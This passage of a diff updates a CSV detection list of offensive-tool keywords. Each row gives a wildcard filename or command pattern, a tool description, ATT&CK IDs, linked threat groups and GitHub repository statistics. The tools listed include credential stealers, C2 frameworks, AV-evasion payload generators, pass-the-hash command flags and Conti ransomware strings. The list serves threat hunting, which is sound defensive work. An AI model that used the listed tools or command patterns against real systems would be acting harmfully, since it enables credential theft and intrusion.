T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*GrantSamAccessPermission.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" @@ -11057,65 +11208,65 @@ "*Group3r.cs*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*Group3r.exe*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*Group3r/Group3r*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" -"*GruntInjection.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*gruntstager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*GruntStager.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*GruntInjection.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*gruntstager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*GruntStager.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*gtfobins*","offensive_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries","T1059 - T1068 - T1043 - T1136","TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://gtfobins.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*GTFOBLookup*","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","3","215","40","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z" -"*gtworek/Priv2Admin*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*gtworek/Priv2Admin*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*guardicore*monkey*","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*guardicore/monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*guida.exe -*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" -"*gunicorn ares:app*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*Gupt-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*guardicore/monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*guida.exe -*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*gunicorn ares:app*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*Gupt-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" -"*-H lm-hash:nt-hash*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*-H 'LMHASH:NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*-H 'NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H lm-hash:nt-hash*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'LMHASH:NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*h2csmuggler --scan-list *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*h2csmuggler -x * --test*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*h8mail -*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*h8mail -t *@*.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*h8mail*","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3553","480","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" -"*Ha3MrX/Gemail-Hack*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","813","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*h8mail*","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3554","480","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" +"*Ha3MrX/Gemail-Hack*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" "*haad/proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*hackbrowersdata.cna*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" -"*hack-browser-data.exe*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*hack-browser-data.exe*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "*hack-browser-data/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*HACKER*FUCKER*Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hackertarget-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*hackingtool.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*hackingtool.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*Hackndo/sprayhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Hackndo/sprayhound*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" -"*hackndo@gmail.com*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*hackndo@gmail.com*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*Hackplayers/evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hackrf_sweep -f *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hacksysteam/CVE-2023-*","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" -"*HackTheWorld*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","9","866","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" -"*Hacktool.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*hacktools-*.xpi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*Hack-Tools-master*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*HackTheWorld*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*Hacktool.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*hacktools-*.xpi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*Hack-Tools-master*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" "*Hack-with-Github*","offensive_tool_keyword","Github Username","An Open Source Hacking Tools database","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hades_directsys.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*HadesLdr-main*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless 